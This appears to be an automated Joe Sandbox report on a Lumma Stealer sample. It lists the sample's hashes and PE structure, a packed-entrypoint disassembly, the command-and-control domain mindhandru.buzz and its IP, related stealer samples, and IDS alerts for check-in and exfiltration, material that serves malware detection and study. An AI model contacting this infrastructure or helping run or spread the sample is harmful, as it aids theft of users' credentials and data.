https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/apine	ZX2M0AXZ56.exe, 00000005.00000003.1885226655.000000000531A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/P	ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/apiW	ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.11.101	mindhandru.buzz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580876
Start date and time:	2024-12-26 12:44:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZX2M0AXZ56.exe renamed because original name is a hash value
Original Sample Name:	e295c4c73781ae57171084aa84070765.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:45:15	API Interceptor	1219156x Sleep call for process: ZX2M0AXZ56.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.11.101	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse
	https://out.novastellz.de/i45/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mindhandru.buzz	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	104.21.11.101

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.547329954677729
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZX2M0AXZ56.exe
File size:	2'964'992 bytes
MD5:	e295c4c73781ae57171084aa84070765
SHA1:	2f5162e8aa22e6ef1433e2fa0f0ac044e545bac2
SHA256:	be152be208036072fc9687649502265a7bc33cea756e4173deb7ebafd9a0c363
SHA512:	3c009d8815fb9eaa9255991ab06742b11bfe9bece827ba0d5edfc17b5797f7d6395fea2ead9195103398c6b5a669128140526f9fdd42261e4b339aa44d16616e
SSDEEP:	49152:VxDxPz9k7Ltp+42rnK7HJV2SIFQ0AUhN:Vx9PzEtpxQKFeOU
TLSH:	BDD56D96BC4571CFC89E1B7A9567EEC2A85D42B907104CC3E859A4BAFD73CC112F6C28
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@..........................@0.....X.....@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x701000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F3B34CB973Ah
hint_nop dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007F3B34CB97A2h
push esi
dec edx
popad
je 00007F3B34CB979Bh
push edx
dec esi
jc 00007F3B34CB97AAh
cmp byte ptr [ebx], dh
push edx
jns 00007F3B34CB9777h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007F3B34CB977Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007F3B34CB9787h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007F3B34CB977Ch
dec eax
dec ebp
jo 00007F3B34CB9773h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007F3B34CB9780h
insd
jnc 00007F3B34CB97A0h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007F3B34CB9788h
push edx
insb
js 00007F3B34CB97A1h
outsb
inc ecx
jno 00007F3B34CB9782h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007F3B34CB977Ch
dec ebx
js 00007F3B34CB9773h
jne 00007F3B34CB9761h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007F3B34CB978Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007F3B34CB976Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007F3B34CB97A3h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	be48e1e015124bfec4d30cc84165ff0f	False	0.9996042687908496	data	7.982480697564679	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zaxvzjyx	0x55000	0x2ab000	0x2aa200	f3b95f962fd36b6f8fc05d7e34b363ca	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iydnotcx	0x300000	0x1000	0x400	625169beee75a52fa51b6b5301b5a0fb	False	0.8037109375	data	6.242808138002607	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x301000	0x3000	0x2200	9807e1eb0831dad89ea3ec21e9b45d09	False	0.3795955882352941	DOS executable (COM)	4.08435039017255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:45:15.887818+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49704	104.21.11.101	443	TCP
2024-12-26T12:45:16.760943+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49704	104.21.11.101	443	TCP
2024-12-26T12:45:16.760943+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49704	104.21.11.101	443	TCP
2024-12-26T12:45:18.079999+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49705	104.21.11.101	443	TCP
2024-12-26T12:45:26.037486+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49705	104.21.11.101	443	TCP
2024-12-26T12:45:26.037486+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49705	104.21.11.101	443	TCP
2024-12-26T12:45:27.725920+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49722	104.21.11.101	443	TCP
2024-12-26T12:46:14.283683+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49722	104.21.11.101	443	TCP
2024-12-26T12:46:15.698798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49827	104.21.11.101	443	TCP
2024-12-26T12:46:22.061858+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49845	104.21.11.101	443	TCP
2024-12-26T12:46:44.248415+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49887	104.21.11.101	443	TCP
2024-12-26T12:46:46.696849+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49893	104.21.11.101	443	TCP
2024-12-26T12:46:48.068193+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49899	104.21.11.101	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:45:14.485850096 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:14.485919952 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:14.486114979 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:14.564996958 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:14.565035105 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:15.887732983 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:15.887818098 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:15.895962954 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:15.896003962 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:15.896615028 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:15.937490940 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:15.999332905 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:15.999353886 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:15.999528885 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:16.760958910 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:16.761089087 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:16.761159897 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:16.763022900 CET	49704	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:16.763045073 CET	443	49704	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:16.773227930 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:16.773282051 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:16.773359060 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:16.773694038 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:16.773709059 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:18.079818010 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:18.079998970 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:18.081558943 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:18.081567049 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:18.081881046 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:18.083343983 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:18.083353996 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:18.083411932 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.037555933 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.037704945 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.037782907 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.037797928 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.037828922 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.037868023 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.037919044 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.039822102 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.039894104 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.039925098 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.048158884 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.048219919 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.048235893 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.056634903 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.056705952 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.056720972 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.109426975 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.156888962 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.203253031 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.247457981 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251000881 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251041889 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251085997 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.251136065 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251162052 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251194954 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.251231909 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.251483917 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.251523018 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.251557112 CET	49705	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.251570940 CET	443	49705	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.419397116 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.419429064 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:26.419532061 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.419864893 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:26.419878006 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:27.725827932 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:27.725919962 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:27.744132996 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:27.744168043 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:27.744436026 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:45:27.753355980 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:27.779515982 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:45:27.779582024 CET	443	49722	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:14.283276081 CET	49722	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:14.387140989 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:14.387202024 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:14.387304068 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:14.387696028 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:14.387716055 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:15.698481083 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:15.698797941 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.709017038 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.709047079 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:15.709865093 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:15.750202894 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.772218943 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.772384882 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.772423983 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:15.776772976 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:15.776782990 CET	443	49827	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:20.219254971 CET	49827	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:20.757023096 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:20.757071018 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:20.757136106 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:20.757523060 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:20.757539034 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:22.061789036 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:22.061857939 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:22.063981056 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:22.063997030 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:22.064311981 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:22.109350920 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:22.109523058 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:22.109560013 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:22.112843990 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:22.112859964 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:42.467538118 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:42.467638016 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:42.467957973 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:42.468178034 CET	49845	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:42.468199015 CET	443	49845	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:42.944367886 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:42.944411039 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:42.944572926 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:42.945058107 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:42.945071936 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.248356104 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.248414993 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:44.257528067 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:44.257550001 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.258363962 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.375184059 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:44.508407116 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:44.508507013 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.508723021 CET	443	49887	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:44.508770943 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:44.508770943 CET	49887	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:45.391804934 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:45.391859055 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:45.391984940 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:45.392865896 CET	49893	443	192.168.2.7	104.21.11.101
Dec 26, 2024 12:46:45.392875910 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.696768999 CET	443	49893	104.21.11.101	192.168.2.7
Dec 26, 2024 12:46:46.696849108 CET	49893	443	192.168.2.7	104.21.11.101
